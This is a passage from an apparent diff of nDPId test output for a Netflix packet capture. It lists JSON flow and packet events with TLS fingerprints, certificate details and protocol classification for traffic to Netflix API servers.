{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035080,"flow_last_seen":1484319035136,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035136,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":227,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035079,"flow_last_seen":1484319035185,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319035185,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not 
Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01477{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319035079,"flow_last_seen":1484319035186,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319035186,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} 
-01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035080,"flow_last_seen":1484319035200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319035200,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01477{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319035080,"flow_last_seen":1484319035215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319035215,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035342,"flow_last_seen":1484319035342,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319035342,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1484319035342,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319035342,"pkt":"gCqoTGHM5JjWH70UCABFAABA3CdAAEAGQP3AqAEHNFkni8+OAbvRf5R9AAAAALAC\/\/8BVgAAAgQFtAEDAwUBAQgKH2TBaAAAAAAEAgAA"} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1484319035397,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319035397,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGMwk0WSeLwKgBBwG7z47YAyXj0X+UfqASRepXrQAAAgQFtAQCCAqtiMk\/H2TBaAEDAwg="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1484319035399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319035399,"pkt":"gCqoTGHM5JjWH70UCABFAAA0+2BAAEAGIdDAqAEHNFkni8+OAbvRf5R+2AMl5IAQEBW8GgAAAQEICh9kwZ2tiMk\/"} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035342,"flow_last_seen":1484319035401,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035401,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":279,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035342,"flow_last_seen":1484319035449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319035449,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035079,"flow_last_seen":1484319035079,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319035079,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1484319035079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319035079,"pkt":"gCqoTGHM5JjWH70UCABFAABAYJ9AAEAGvIXAqAEHNFkni8+MAbsc0sO0AAAAALAC\/\/+HyQAAAgQFtAEDAwUBAQgKH2TAbQAAAAAEAgAA"} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035080,"flow_last_seen":1484319035080,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319035080,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1484319035080,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319035080,"pkt":"gCqoTGHM5JjWH70UCABFAABASDpAAEAG1OrAqAEHNFkni8+NAbuZGBE+AAAAALAC\/\/+99wAAAgQFtAEDAwUBAQgKH2TAbgAAAAAEAgAA"} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1484319035129,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319035129,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGMwk0WSeLwKgBBwG7z4zl6UHQHNLDtaASReq0kAAAAgQFtAQCCAqtiMj8H2TAbQEDAwg="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1484319035130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319035130,"pkt":"gCqoTGHM5JjWH70UCABFAAA0gZlAAEAGm5fAqAEHNFkni8+MAbsc0sO15elB0YAQEBUZAAAAAQEICh9kwKCtiMj8"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1484319035130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319035130,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGNAk0WSeLwKgBBwG7z40HBfk7mRgRP6ASReoSOAAAAgQFtAQCCAqtiMj8H2TAbgEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1484319035132,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319035132,"pkt":"gCqoTGHM5JjWH70UCABFAAA0YNFAAEAGvF\/AqAEHNFkni8+NAbuZGBE\/BwX5PIAQEBV2pwAAAQEICh9kwKGtiMj8"} 
+00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035079,"flow_last_seen":1484319035134,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035134,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035080,"flow_last_seen":1484319035136,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035136,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":227,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035079,"flow_last_seen":1484319035185,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319035185,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01477{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319035079,"flow_last_seen":1484319035186,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319035186,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":231,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035080,"flow_last_seen":1484319035200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1484319035200,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
+01477{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":232,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319035080,"flow_last_seen":1484319035215,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3104,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1484319035215,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319035342,"flow_last_seen":1484319035342,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319035342,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1484319035342,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319035342,"pkt":"gCqoTGHM5JjWH70UCABFAABA3CdAAEAGQP3AqAEHNFkni8+OAbvRf5R9AAAAALAC\/\/8BVgAAAgQFtAEDAwUBAQgKH2TBaAAAAAAEAgAA"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1484319035397,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319035397,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGMwk0WSeLwKgBBwG7z47YAyXj0X+UfqASRepXrQAAAgQFtAQCCAqtiMk\/H2TBaAEDAwg="} 
+00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":268,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1484319035399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319035399,"pkt":"gCqoTGHM5JjWH70UCABFAAA0+2BAAEAGIdDAqAEHNFkni8+OAbvRf5R+2AMl5IAQEBW8GgAAAQEICh9kwZ2tiMk\/"} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319035342,"flow_last_seen":1484319035401,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1484319035401,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":279,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319035342,"flow_last_seen":1484319035449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":353,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1484319035449,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"7e72698146290dd68239f788a452e7d8","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"netflix.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1484319035889,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":164,"pkt_l4_len":130,"thread_ts_msec":1484319035889,"pkt":"AQBef\/\/65JjWH70UCABFAACW0KMAAAERNwrAqAEH7\/\/\/+tIQB2wAggqVTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMg0KU1Q6IHVybjptZHgtbmV0ZmxpeC1jb206c2VydmljZTp0YXJnZXQ6MA0KDQo="} 
